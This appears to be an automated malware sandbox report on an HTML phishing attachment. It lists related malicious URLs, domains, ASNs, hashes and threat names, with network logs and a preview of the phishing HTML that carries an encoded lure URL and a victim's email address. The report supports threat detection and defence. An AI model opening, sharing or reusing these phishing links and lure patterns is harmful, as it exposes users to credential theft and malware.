	https://cas5-0-urlprotect.trendmicro.com:443/wis/clicktime/v1/query?url=https%3a%2f%2fu12671193.ct.sendgrid.net%2fls%2fclick%3fupn%3du001.k35xCjttYAB%2d2ByTZ%2d2BAAvadOAXR%2d2B959INr1%2d2FbBT0JFtHTjdzCmKnZqhfbJ7xwNa9UvUJf3%5f3mfc%2d2FWgSqxTuGwErgtExczuJgdsgQgJamYlSsELFQGMxL61TJhHJ8Dc2oD5W58szgjxndN6IeEEkinOh1JBLZ4okN4946WeZNUE4q1%2d2FJnA8%2d2FcYtbJAsCk9kYyIRtSwnDxDYvyhRygVEvnFCLcwHqMePX9fGj152eUjHwql8Ak5r%2d2FJnls6n4Ba1NvoYO2ZwGGA%2d2F3a5POE7POsB3z7ZB2xBQ%2d3D%2d3D&umid=dce65515-a591-4229-b6a0-16e11ca40081&auth=9e10be9bec12a59a881d8b0c368909bace3e61f2-a415c17e3bffc3a2b807b6df612cd48b5733afa2	Get hash	malicious	Unknown	Browse
	https://aka.ms/gettenantid__;!!FRLE-BHliQ!3x_w1Q7SGdHvSo4v2ZLKY3nTDxl4AIh08DaUkuJ8kqLSoWHDCRnXUcjhLBCdsV3PheBEVf_eI4xxpT8Kg5376nh9XLU$	Get hash	malicious	Unknown	Browse
	sterverexe.exe	Get hash	malicious	FatalRAT, GhostRat, Nitol	Browse
	call_Playback_gelita.com.html	Get hash	malicious	HTMLPhisher	Browse
	KEMPER NORTH AMERICA WIRE REMITTANCE.xlsx	Get hash	malicious	HTMLPhisher	Browse
	https://xoxtds.lovelycarrot.com/	Get hash	malicious	HTMLPhisher	Browse
	Electronic Slip_nhbpi.com.html	Get hash	malicious	HTMLPhisher	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s-part-0014.t-0009.t-msedge.net	https://he110ca11he1lpn0wwb112.pages.dev/	Get hash	malicious	TechSupportScam	Browse	13.107.246.42
	https://serviceca11he1pn0waa12.pages.dev/	Get hash	malicious	TechSupportScam	Browse	13.107.246.42
	http://pub-0ed5a1f263894eab8341e034994e9627.r2.dev/park.html	Get hash	malicious	HTMLPhisher	Browse	13.107.246.42
	KEMPER NORTH AMERICA WIRE REMITTANCE.xlsx	Get hash	malicious	HTMLPhisher	Browse	13.107.246.42
	https://aka.ms/gettenantid__;!!FRLE-BHliQ!3x_w1Q7SGdHvSo4v2ZLKY3nTDxl4AIh08DaUkuJ8kqLSoWHDCRnXUcjhLBCdsV3PheBEVf_eI4xxpT8Kg5376nh9XLU$	Get hash	malicious	Unknown	Browse	13.107.246.42
	https://kawak.com.co	Get hash	malicious	Unknown	Browse	13.107.246.42
	call_Playback_gelita.com.html	Get hash	malicious	HTMLPhisher	Browse	13.107.246.42
	KEMPER NORTH AMERICA WIRE REMITTANCE.xlsx	Get hash	malicious	HTMLPhisher	Browse	13.107.246.42
	https://xoxtds.lovelycarrot.com/	Get hash	malicious	HTMLPhisher	Browse	13.107.246.42
	Electronic Slip_nhbpi.com.html	Get hash	malicious	HTMLPhisher	Browse	13.107.246.42
d2vgu95hoyrpkh.cloudfront.net	https://vk.com////away.php?to=https://tracker.club-os.com////campaign/click?msgId=d3xr838c6bd137e6a03157c6c728cbc659e734fc398%26test=false%26target=circuitovtr.com.br/dayo/cezlu/captcha/dGVzdEB0ZXN0LmNvbQ==	Get hash	malicious	HTMLPhisher	Browse	108.157.188.81
	Confirmation For-Certara.pdf	Get hash	malicious	HTMLPhisher	Browse	13.227.219.47
	https://edworking.com/share/workspace/clxw0fp4e0tq913ofsrqas5ot	Get hash	malicious	HTMLPhisher	Browse	18.245.31.89
	Remittance advice 26b44723892edfbd6baf.eml	Get hash	malicious	HTMLPhisher	Browse	108.157.188.81
	https://vjl.urj7z9q.com/VjL/	Get hash	malicious	HTMLPhisher	Browse	18.245.31.78
	https://docs.google.com/presentation/d/e/2PACX-1vTxBgqg7dCOSaZSLN5pY9aNfjHRIitI17n4FtUD5p57W5eC0FJjtsHoXU0oAJ--8KMU50z8qn5Wsddo/pub?start=false&loop=false&delayms=3000	Get hash	malicious	HTMLPhisher	Browse	13.227.219.11
	https://7yntu.fqqydm.ru/7YnTU2/#Xxxxx.xxxx@xxxx.co.uk	Get hash	malicious	HTMLPhisher	Browse	18.245.31.33
	Employee Benefits Enrollment for ryan.evans - ADP.pdf	Get hash	malicious	HTMLPhisher	Browse	18.245.31.5
	Quarantined Messages.zip	Get hash	malicious	HTMLPhisher	Browse	18.245.31.78
	https://searchflow.mf67x.com/b3bKZ9K0/#xxx.xxx@xxx.co.uk	Get hash	malicious	HTMLPhisher	Browse	18.245.31.89
cs837.wac.edgecastcdn.net	INVOICE [PAID] ref-A1SQM.html	Get hash	malicious	HTMLPhisher	Browse	192.229.133.221
	INVOICE [PAID] ref-APOVN.html	Get hash	malicious	HTMLPhisher	Browse	192.229.133.221
	Budget_Statement.htm	Get hash	malicious	HTMLPhisher	Browse	192.229.133.221
	0055-fac_aftral.com_Thursday, June 20, 2024.html	Get hash	malicious	HTMLPhisher	Browse	192.229.133.221
	https://pub-23354ce60e01474fa600cbca2caadc73.r2.dev/index.html	Get hash	malicious	Unknown	Browse	192.229.133.221
	061324.html	Get hash	malicious	HTMLPhisher	Browse	192.229.133.221
	https://ipfs.io/ipfs/bafybeidxmipzaalmlognb3rfcfcibqulicnk3gmalayem2sm4xeqphc43a/Delivery.html	Get hash	malicious	Unknown	Browse	192.229.133.221
	https://my.sitejet.io/goto/3439258/dc5dce685f2ba1e450cdc6f61e8da88fa7883359b772e3a5b673b56475e9885f/my_website_presentation	Get hash	malicious	HTMLPhisher	Browse	192.229.133.221
	check(1).html	Get hash	malicious	HTMLPhisher	Browse	192.229.133.221
	https://ipfs.io/ipfs/bafkreifwplcqnc5zn26ubzvn44lf6k2v62bi6vwcwsnpakzpifgqhvt2ve	Get hash	malicious	HTMLPhisher	Browse	192.229.133.221
s-part-0016.t-0009.fb-t-msedge.net	Remit_Advice_SMKT_.html	Get hash	malicious	HTMLPhisher	Browse	13.107.253.44
	https://ms-doc.secure-chamber-fil3-doc3565.com/?Ld6B=D0T	Get hash	malicious	Unknown	Browse	13.107.253.44
	https://storageview.us-ord-1.linodeobjects.com/reserved.html	Get hash	malicious	HTMLPhisher	Browse	13.107.253.44
	QPT 8.9 for PowerPoint.exe	Get hash	malicious	Unknown	Browse	13.107.253.44
sni1gl.wpc.omegacdn.net	https://aka.ms/gettenantid__;!!FRLE-BHliQ!3x_w1Q7SGdHvSo4v2ZLKY3nTDxl4AIh08DaUkuJ8kqLSoWHDCRnXUcjhLBCdsV3PheBEVf_eI4xxpT8Kg5376nh9XLU$	Get hash	malicious	Unknown	Browse	152.199.21.175
	call_Playback_gelita.com.html	Get hash	malicious	HTMLPhisher	Browse	152.199.21.175
	Electronic Slip_nhbpi.com.html	Get hash	malicious	HTMLPhisher	Browse	152.199.21.175
	Hand Book.docx	Get hash	malicious	Unknown	Browse	152.199.21.175
	https://gtus365-my.sharepoint.com/personal/kristen_brill_us_gt_com/Access%20Requests/pendingreq.aspx?mbypass=1&ApproveAccessRequest=true&AccessRequestID=%7B4EE0BFC1-33C1-49DD-A800-4ADCF89CF283%7D	Get hash	malicious	Unknown	Browse	152.199.21.175
	https://www.linkedin.com/redir/redirect?url=https%3A%2F%2Fassets-usa%2Emkt%2Edynamics%2Ecom%2F5513f990-d232-ef11-8e4b-000d3a98a01a%2Fdigitalassets%2Fstandaloneforms%2F12aaa575-c233-ef11-8409-000d3a4effc3&urlhash=z-cH&trk=public_profile-settings_topcard-website	Get hash	malicious	HTMLPhisher	Browse	152.199.21.175
	https://www.linkedin.com/redir/redirect?url=https%3A%2F%2Fassets-usa%2Emkt%2Edynamics%2Ecom%2F5513f990-d232-ef11-8e4b-000d3a98a01a%2Fdigitalassets%2Fstandaloneforms%2F12aaa575-c233-ef11-8409-000d3a4effc3&urlhash=z-cH&trk=public_profile-settings_topcard-website	Get hash	malicious	HTMLPhisher	Browse	152.199.21.175
	call_Playback_vertexone.net.html	Get hash	malicious	HTMLPhisher	Browse	152.199.21.175
	INVOICE [PAID] ref-A1SQM.html	Get hash	malicious	HTMLPhisher	Browse	152.199.21.175
	https://workers-playground-tiny-shape-7eca.oracleofriches.workers.dev/#fourchon16.dispatcher@martinmlp.com	Get hash	malicious	HTMLPhisher	Browse	152.199.21.175

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
MICROSOFT-CORP-MSN-AS-BLOCKUS	https://he110ca11he1lpn0wwb112.pages.dev/	Get hash	malicious	TechSupportScam	Browse	13.107.246.60
	https://serviceca11he1pn0waa12.pages.dev/	Get hash	malicious	TechSupportScam	Browse	13.107.246.60
	http://pub-0ed5a1f263894eab8341e034994e9627.r2.dev/park.html	Get hash	malicious	HTMLPhisher	Browse	13.107.246.60
	https://local663-my.sharepoint.com/:o:/p/jwilliamson/EpgyUPvRdItHq7L_ALPADiIBHAEoWVflvyYteyg7bKYNMA?e=5%3aGz9SHf&at=9	Get hash	malicious	HTMLPhisher	Browse	13.107.136.10
	(No subject) (24).eml	Get hash	malicious	HTMLPhisher	Browse	104.47.64.28
	https://pplmotorhomes-my.sharepoint.com/:o:/p/j_vogt/EvYvW-hDwPRLpu9xlLp1sbcBCLpg-XT-f_4SJdazBLqp5w?e=5%3adTB1PD&at=9	Get hash	malicious	HTMLPhisher	Browse	52.107.243.198
	KEMPER NORTH AMERICA WIRE REMITTANCE.xlsx	Get hash	malicious	HTMLPhisher	Browse	104.208.16.88
	https://cas5-0-urlprotect.trendmicro.com:443/wis/clicktime/v1/query?url=https%3a%2f%2fu12671193.ct.sendgrid.net%2fls%2fclick%3fupn%3du001.k35xCjttYAB%2d2ByTZ%2d2BAAvadOAXR%2d2B959INr1%2d2FbBT0JFtHTjdzCmKnZqhfbJ7xwNa9UvUJf3%5f3mfc%2d2FWgSqxTuGwErgtExczuJgdsgQgJamYlSsELFQGMxL61TJhHJ8Dc2oD5W58szgjxndN6IeEEkinOh1JBLZ4okN4946WeZNUE4q1%2d2FJnA8%2d2FcYtbJAsCk9kYyIRtSwnDxDYvyhRygVEvnFCLcwHqMePX9fGj152eUjHwql8Ak5r%2d2FJnls6n4Ba1NvoYO2ZwGGA%2d2F3a5POE7POsB3z7ZB2xBQ%2d3D%2d3D&umid=dce65515-a591-4229-b6a0-16e11ca40081&auth=9e10be9bec12a59a881d8b0c368909bace3e61f2-a415c17e3bffc3a2b807b6df612cd48b5733afa2	Get hash	malicious	Unknown	Browse	13.107.246.60
	https://aka.ms/gettenantid__;!!FRLE-BHliQ!3x_w1Q7SGdHvSo4v2ZLKY3nTDxl4AIh08DaUkuJ8kqLSoWHDCRnXUcjhLBCdsV3PheBEVf_eI4xxpT8Kg5376nh9XLU$	Get hash	malicious	Unknown	Browse	150.171.27.10
	Potvrda narudzbe u prilogu.exe	Get hash	malicious	DBatLoader, FormBook	Browse	13.107.139.11
MICROSOFT-CORP-MSN-AS-BLOCKUS	https://he110ca11he1lpn0wwb112.pages.dev/	Get hash	malicious	TechSupportScam	Browse	13.107.246.60
	https://serviceca11he1pn0waa12.pages.dev/	Get hash	malicious	TechSupportScam	Browse	13.107.246.60
	http://pub-0ed5a1f263894eab8341e034994e9627.r2.dev/park.html	Get hash	malicious	HTMLPhisher	Browse	13.107.246.60
	https://local663-my.sharepoint.com/:o:/p/jwilliamson/EpgyUPvRdItHq7L_ALPADiIBHAEoWVflvyYteyg7bKYNMA?e=5%3aGz9SHf&at=9	Get hash	malicious	HTMLPhisher	Browse	13.107.136.10
	(No subject) (24).eml	Get hash	malicious	HTMLPhisher	Browse	104.47.64.28
	https://pplmotorhomes-my.sharepoint.com/:o:/p/j_vogt/EvYvW-hDwPRLpu9xlLp1sbcBCLpg-XT-f_4SJdazBLqp5w?e=5%3adTB1PD&at=9	Get hash	malicious	HTMLPhisher	Browse	52.107.243.198
	KEMPER NORTH AMERICA WIRE REMITTANCE.xlsx	Get hash	malicious	HTMLPhisher	Browse	104.208.16.88
	https://cas5-0-urlprotect.trendmicro.com:443/wis/clicktime/v1/query?url=https%3a%2f%2fu12671193.ct.sendgrid.net%2fls%2fclick%3fupn%3du001.k35xCjttYAB%2d2ByTZ%2d2BAAvadOAXR%2d2B959INr1%2d2FbBT0JFtHTjdzCmKnZqhfbJ7xwNa9UvUJf3%5f3mfc%2d2FWgSqxTuGwErgtExczuJgdsgQgJamYlSsELFQGMxL61TJhHJ8Dc2oD5W58szgjxndN6IeEEkinOh1JBLZ4okN4946WeZNUE4q1%2d2FJnA8%2d2FcYtbJAsCk9kYyIRtSwnDxDYvyhRygVEvnFCLcwHqMePX9fGj152eUjHwql8Ak5r%2d2FJnls6n4Ba1NvoYO2ZwGGA%2d2F3a5POE7POsB3z7ZB2xBQ%2d3D%2d3D&umid=dce65515-a591-4229-b6a0-16e11ca40081&auth=9e10be9bec12a59a881d8b0c368909bace3e61f2-a415c17e3bffc3a2b807b6df612cd48b5733afa2	Get hash	malicious	Unknown	Browse	13.107.246.60
	https://aka.ms/gettenantid__;!!FRLE-BHliQ!3x_w1Q7SGdHvSo4v2ZLKY3nTDxl4AIh08DaUkuJ8kqLSoWHDCRnXUcjhLBCdsV3PheBEVf_eI4xxpT8Kg5376nh9XLU$	Get hash	malicious	Unknown	Browse	150.171.27.10
	Potvrda narudzbe u prilogu.exe	Get hash	malicious	DBatLoader, FormBook	Browse	13.107.139.11
MICROSOFT-CORP-MSN-AS-BLOCKUS	https://he110ca11he1lpn0wwb112.pages.dev/	Get hash	malicious	TechSupportScam	Browse	13.107.246.60
	https://serviceca11he1pn0waa12.pages.dev/	Get hash	malicious	TechSupportScam	Browse	13.107.246.60
	http://pub-0ed5a1f263894eab8341e034994e9627.r2.dev/park.html	Get hash	malicious	HTMLPhisher	Browse	13.107.246.60
	https://local663-my.sharepoint.com/:o:/p/jwilliamson/EpgyUPvRdItHq7L_ALPADiIBHAEoWVflvyYteyg7bKYNMA?e=5%3aGz9SHf&at=9	Get hash	malicious	HTMLPhisher	Browse	13.107.136.10
	(No subject) (24).eml	Get hash	malicious	HTMLPhisher	Browse	104.47.64.28
	https://pplmotorhomes-my.sharepoint.com/:o:/p/j_vogt/EvYvW-hDwPRLpu9xlLp1sbcBCLpg-XT-f_4SJdazBLqp5w?e=5%3adTB1PD&at=9	Get hash	malicious	HTMLPhisher	Browse	52.107.243.198
	KEMPER NORTH AMERICA WIRE REMITTANCE.xlsx	Get hash	malicious	HTMLPhisher	Browse	104.208.16.88
	https://cas5-0-urlprotect.trendmicro.com:443/wis/clicktime/v1/query?url=https%3a%2f%2fu12671193.ct.sendgrid.net%2fls%2fclick%3fupn%3du001.k35xCjttYAB%2d2ByTZ%2d2BAAvadOAXR%2d2B959INr1%2d2FbBT0JFtHTjdzCmKnZqhfbJ7xwNa9UvUJf3%5f3mfc%2d2FWgSqxTuGwErgtExczuJgdsgQgJamYlSsELFQGMxL61TJhHJ8Dc2oD5W58szgjxndN6IeEEkinOh1JBLZ4okN4946WeZNUE4q1%2d2FJnA8%2d2FcYtbJAsCk9kYyIRtSwnDxDYvyhRygVEvnFCLcwHqMePX9fGj152eUjHwql8Ak5r%2d2FJnls6n4Ba1NvoYO2ZwGGA%2d2F3a5POE7POsB3z7ZB2xBQ%2d3D%2d3D&umid=dce65515-a591-4229-b6a0-16e11ca40081&auth=9e10be9bec12a59a881d8b0c368909bace3e61f2-a415c17e3bffc3a2b807b6df612cd48b5733afa2	Get hash	malicious	Unknown	Browse	13.107.246.60
	https://aka.ms/gettenantid__;!!FRLE-BHliQ!3x_w1Q7SGdHvSo4v2ZLKY3nTDxl4AIh08DaUkuJ8kqLSoWHDCRnXUcjhLBCdsV3PheBEVf_eI4xxpT8Kg5376nh9XLU$	Get hash	malicious	Unknown	Browse	150.171.27.10
	Potvrda narudzbe u prilogu.exe	Get hash	malicious	DBatLoader, FormBook	Browse	13.107.139.11
EDGECASTUS	http://sites.google.com/l0gin-microsoftwebonlne.app/867487/	Get hash	malicious	Unknown	Browse	93.184.221.165
	Aud_Msg_Scs_V.M1f536dcd0e8af1baf5dc97ff0a839f87a34b25b7.html	Get hash	malicious	Unknown	Browse	93.184.223.214
	https://aka.ms/gettenantid__;!!FRLE-BHliQ!3x_w1Q7SGdHvSo4v2ZLKY3nTDxl4AIh08DaUkuJ8kqLSoWHDCRnXUcjhLBCdsV3PheBEVf_eI4xxpT8Kg5376nh9XLU$	Get hash	malicious	Unknown	Browse	152.199.21.175
	https://kawak.com.co	Get hash	malicious	Unknown	Browse	152.199.21.175
	call_Playback_gelita.com.html	Get hash	malicious	HTMLPhisher	Browse	152.199.21.175
	REMITTANCE 83-For-Dot.pdf	Get hash	malicious	Unknown	Browse	93.184.221.240
	Briles Law Office.pdf	Get hash	malicious	Unknown	Browse	93.184.221.165
	Electronic Slip_nhbpi.com.html	Get hash	malicious	HTMLPhisher	Browse	152.199.21.175
	Confirmation For-Certara.pdf	Get hash	malicious	HTMLPhisher	Browse	152.199.21.175
	Hand Book.docx	Get hash	malicious	Unknown	Browse	152.199.21.175
AMAZON-02US	3IWSSh31C6.elf	Get hash	malicious	Mirai	Browse	54.171.230.55
	https://branchlock.net	Get hash	malicious	Unknown	Browse	65.9.66.27
	https://caterwauling-nine-menu.glitch.me/#ZXF1aXRhYmxlcy5yZWdpb24uaWxlZGVmcmFuY2VAaWxlZGVmcmFuY2UuZnI=	Get hash	malicious	HTMLPhisher	Browse	13.35.58.96
	http://pub-a4db5d6837084a76bc5f6d9216e7e57d.r2.dev/a38.html	Get hash	malicious	Unknown	Browse	3.70.101.28
	http://pub-5d5794a1344e4ef09c0d498cb30f8875.r2.dev/index.html	Get hash	malicious	Unknown	Browse	3.70.101.28
	http://pub-72f4175190054b068a6db1f116f55ca9.r2.dev/index.html	Get hash	malicious	Unknown	Browse	3.72.140.173
	http://pub-5e86a1f01e5a4476812e4d108add0587.r2.dev/index.html	Get hash	malicious	Unknown	Browse	3.70.101.28
	http://pub-49f7bdad3ae7458f8076aa4480203a8b.r2.dev/index.html	Get hash	malicious	Unknown	Browse	52.58.254.253
	http://page-timefthrturtuj.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	3.160.210.89
	http://pub-ab9522f1c3a9451fb5bf68fa1c6bcfca.r2.dev/index.html	Get hash	malicious	Unknown	Browse	18.192.94.96
CLOUDFLARENETUS	w5APKwp5DD.exe	Get hash	malicious	AsyncRAT, HTMLPhisher, MicroClip, StormKitty, WorldWind Stealer	Browse	172.67.196.114
	4TwN2MkH2l.rtf	Get hash	malicious	Unknown	Browse	104.21.83.128
	QoNAd2x2wy.rtf	Get hash	malicious	Unknown	Browse	104.21.83.128
	k43lWDu3AB.exe	Get hash	malicious	DCRat	Browse	104.20.4.235
	https://branchlock.net	Get hash	malicious	Unknown	Browse	172.67.142.195
	17851032425.zip	Get hash	malicious	NetSupport RAT	Browse	104.26.1.231
	https://caterwauling-nine-menu.glitch.me/#ZXF1aXRhYmxlcy5yZWdpb24uaWxlZGVmcmFuY2VAaWxlZGVmcmFuY2UuZnI=	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	https://hamids-worker.hamidyousefi93.workers.dev/	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://jiedian.dadabing023.workers.dev/	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://t4ha7.shop/	Get hash	malicious	Unknown	Browse	104.21.37.50

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	https://branchlock.net	Get hash	malicious	Unknown	Browse	40.68.123.157 184.28.90.27
	https://t4ha7.shop/	Get hash	malicious	Unknown	Browse	40.68.123.157 184.28.90.27
	https://aradcofeenet1.aradcofeenet1.workers.dev/	Get hash	malicious	Unknown	Browse	40.68.123.157 184.28.90.27
	http://www.youkonew.anakembok.de/	Get hash	malicious	Unknown	Browse	40.68.123.157 184.28.90.27
	http://purchase-order-workers-playground-weathered-moon-6962.mslee.workers.dev/	Get hash	malicious	Unknown	Browse	40.68.123.157 184.28.90.27
	http://www.services-nickel.yayra-food.com/	Get hash	malicious	Unknown	Browse	40.68.123.157 184.28.90.27
	https://he110ca11he1lpn0wwb112.pages.dev/	Get hash	malicious	TechSupportScam	Browse	40.68.123.157 184.28.90.27
	http://pub-a4db5d6837084a76bc5f6d9216e7e57d.r2.dev/a38.html	Get hash	malicious	Unknown	Browse	40.68.123.157 184.28.90.27
	https://sumydeko.blogspot.in/	Get hash	malicious	Unknown	Browse	40.68.123.157 184.28.90.27
	https://linnil.pwq.workers.dev/	Get hash	malicious	Unknown	Browse	40.68.123.157 184.28.90.27

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Jun 28 06:25:59 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2673
Entropy (8bit):	3.9789067955276622
Encrypted:	false
SSDEEP:	48:8IdfTXPfKHjeidAKZdA1FehwiZUklqehr1ny+3:88DfXS5y
MD5:	160029214F3EF4276F1A7D89091D7608
SHA1:	064B6CA96193146536CC965AB199FB125E4A3F13
SHA-256:	F5A2357E01B47D2F150445321CCF557DB0B8F548DEE54F9F29F80E9061310A4E
SHA-512:	E2FB694AE259C975A2E84CA1BF6B50DBD843A7BF3485599701579407F629BACA5298C774E7BE80A17242F7D2CD6AD6FE961697DEF12568E8ED4876B175E795B0
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,......al,...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.X4;....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X=;....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X=;....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X=;..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X@;...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........1bc......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

File type:	HTML document, ASCII text, with very long lines (3881), with CRLF line terminators
Entropy (8bit):	4.337765686403046
TrID:	HyperText Markup Language (15015/1) 55.58% HyperText Markup Language (12001/1) 44.42%
File name:	faturas_dsp.qs.pt_Wednesday, June 5, 2024.html
File size:	5'550 bytes
MD5:	da0e2e9aa5fdb917804890339d2489b9
SHA1:	8b750c233f72b819f00e2bcaf353788522c24cea
SHA256:	a24b2a8ca23148775aef82e52f5ebe51aa1bf62c2e129d2b125e1bbb67c8c448
SHA512:	da010769222577501ace8fe8c1389095630e942a9eb27d4b3012db4edf73a089d65802936741af361c24779e8ce67c1f531f7a2b63a27baa10a6856b75e27903
SSDEEP:	48:tNFI4EdAaA79QZBoUCMQOatAibJANzRInlySpzIp+gKYEy8m3KYuNn9kNn9UKYXq:xG9kqroIad5lBJGI9M9k9O9BSKfH1v
TLSH:	9DB1383CB963D18EE17B5DBFFC903964C0450E83D6CDA78804ACC5592FF46A87418AE5
File Content Preview:	<!DOCTYPE html>..<html point="aHR0cHM6Ly9maXZlcmFkaW8tbmV3YmFtLmNvbQ==" id="html" sti="VlZORlVqSXhNRFV5TURJMFZVNUpVVlZGTVRBek1UQTFNakV5TkRJd01qUXlNREkwTURVeU1UTXhNVEF5TkE9PQ==" vic="maria.dixe@dsp.qs.pt" lang="en">....<head>....</head>....<body id="allbod

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 28, 2024 09:25:57.552849054 CEST	53	52054	1.1.1.1	192.168.2.16
Jun 28, 2024 09:25:57.579284906 CEST	53	61332	1.1.1.1	192.168.2.16
Jun 28, 2024 09:25:57.681399107 CEST	64915	53	192.168.2.16	1.1.1.1
Jun 28, 2024 09:25:57.681595087 CEST	52094	53	192.168.2.16	1.1.1.1
Jun 28, 2024 09:25:57.682754040 CEST	61659	53	192.168.2.16	1.1.1.1
Jun 28, 2024 09:25:57.683072090 CEST	64637	53	192.168.2.16	1.1.1.1
Jun 28, 2024 09:25:57.688628912 CEST	53	64915	1.1.1.1	192.168.2.16
Jun 28, 2024 09:25:57.688798904 CEST	53	52094	1.1.1.1	192.168.2.16
Jun 28, 2024 09:25:57.719093084 CEST	53	61659	1.1.1.1	192.168.2.16
Jun 28, 2024 09:25:57.719104052 CEST	53	64637	1.1.1.1	192.168.2.16
Jun 28, 2024 09:25:58.574114084 CEST	53	52586	1.1.1.1	192.168.2.16
Jun 28, 2024 09:25:59.562815905 CEST	61686	53	192.168.2.16	1.1.1.1
Jun 28, 2024 09:25:59.562977076 CEST	65273	53	192.168.2.16	1.1.1.1
Jun 28, 2024 09:25:59.628313065 CEST	61768	53	192.168.2.16	1.1.1.1
Jun 28, 2024 09:25:59.628469944 CEST	53975	53	192.168.2.16	1.1.1.1
Jun 28, 2024 09:26:00.574105978 CEST	53	55881	1.1.1.1	192.168.2.16
Jun 28, 2024 09:26:00.574115992 CEST	53	61768	1.1.1.1	192.168.2.16
Jun 28, 2024 09:26:00.574121952 CEST	53	53975	1.1.1.1	192.168.2.16
Jun 28, 2024 09:26:00.574481010 CEST	53	65273	1.1.1.1	192.168.2.16
Jun 28, 2024 09:26:00.574670076 CEST	51688	53	192.168.2.16	1.1.1.1
Jun 28, 2024 09:26:00.574851990 CEST	54609	53	192.168.2.16	1.1.1.1
Jun 28, 2024 09:26:00.575051069 CEST	53	61686	1.1.1.1	192.168.2.16
Jun 28, 2024 09:26:00.594438076 CEST	53	54609	1.1.1.1	192.168.2.16
Jun 28, 2024 09:26:00.605106115 CEST	53	51688	1.1.1.1	192.168.2.16
Jun 28, 2024 09:26:01.509228945 CEST	53	62614	1.1.1.1	192.168.2.16
Jun 28, 2024 09:26:01.671617985 CEST	57032	53	192.168.2.16	1.1.1.1
Jun 28, 2024 09:26:01.672270060 CEST	61425	53	192.168.2.16	1.1.1.1
Jun 28, 2024 09:26:01.678307056 CEST	53	57032	1.1.1.1	192.168.2.16
Jun 28, 2024 09:26:01.679424047 CEST	53	61425	1.1.1.1	192.168.2.16
Jun 28, 2024 09:26:02.386145115 CEST	52757	53	192.168.2.16	1.1.1.1
Jun 28, 2024 09:26:02.386145115 CEST	55603	53	192.168.2.16	1.1.1.1
Jun 28, 2024 09:26:02.393462896 CEST	53	55603	1.1.1.1	192.168.2.16
Jun 28, 2024 09:26:02.393657923 CEST	53	52757	1.1.1.1	192.168.2.16
Jun 28, 2024 09:26:02.615475893 CEST	53	61627	1.1.1.1	192.168.2.16
Jun 28, 2024 09:26:09.668368101 CEST	55362	53	192.168.2.16	1.1.1.1
Jun 28, 2024 09:26:09.668508053 CEST	64405	53	192.168.2.16	1.1.1.1
Jun 28, 2024 09:26:09.683980942 CEST	53	64405	1.1.1.1	192.168.2.16
Jun 28, 2024 09:26:09.863487959 CEST	53	55362	1.1.1.1	192.168.2.16
Jun 28, 2024 09:26:11.656735897 CEST	55377	53	192.168.2.16	1.1.1.1
Jun 28, 2024 09:26:11.656735897 CEST	58109	53	192.168.2.16	1.1.1.1
Jun 28, 2024 09:26:11.663829088 CEST	53	55377	1.1.1.1	192.168.2.16
Jun 28, 2024 09:26:11.663844109 CEST	53	58109	1.1.1.1	192.168.2.16
Jun 28, 2024 09:26:57.554668903 CEST	53	62660	1.1.1.1	192.168.2.16
Jun 28, 2024 09:27:04.274966955 CEST	138	138	192.168.2.16	192.168.2.255

Timestamp	Bytes transferred	Direction	Data
2024-06-28 07:25:51 UTC	59	OUT	GET / HTTP/1.1 Host: ipinfo.io Connection: Keep-Alive
2024-06-28 07:25:51 UTC	513	IN	HTTP/1.1 200 OK server: nginx/1.24.0 date: Fri, 28 Jun 2024 07:25:51 GMT content-type: application/json; charset=utf-8 Content-Length: 319 access-control-allow-origin: * x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block x-content-type-options: nosniff referrer-policy: strict-origin-when-cross-origin x-envoy-upstream-service-time: 1 via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
